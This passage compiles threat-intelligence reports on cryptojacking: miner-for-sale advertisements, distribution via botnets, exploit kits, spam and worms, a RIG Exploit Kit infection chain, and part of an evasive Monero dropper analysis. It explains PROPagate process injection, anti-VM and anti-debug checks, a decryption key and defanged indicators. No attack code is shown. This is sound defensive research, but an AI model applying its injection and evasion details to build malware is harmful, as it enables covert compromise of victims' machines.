In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe

state_bank_of_india_money_transfer_agency.exe

format_transfer_sms_banking_bni_ke_bca.exe

confirmation_receipt_letter_sample.exe

sbi_online_apply_2015_po.exe

estimated_tax_payment_coupon_irs.exe

how_to_add_a_non_us_bank_account_to_paypal.exe

western_union_money_transfer_from_uk_to_bangladesh.exe

can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe

how_to_open_a_business_bank_account_with_bad_credit_history.exe

apply_for_sbi_credit_card_online.exe

list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

The landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419 which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the BeingDebugged flag is set, the executable terminates itself.

The malware also implements an Anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0.

It checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen.  Each of these strings is indictative of virtual machines

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

Introduction

It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers to anybody a lucrative way to exchange computation resources for profit: every time a miner guesses the solution of a complex mathematical puzzle, he is awarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One, in particular, is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue javascripts or binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new improved detection techniques, developers of these binaries began to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.

Dropper

The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .Net application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by some strings already giving away some of the functionalities included (in particular, note the CheckSandbox and CheckVM strings, most likely indicating routines used to detect whether the sample is run inside an analysis environment).

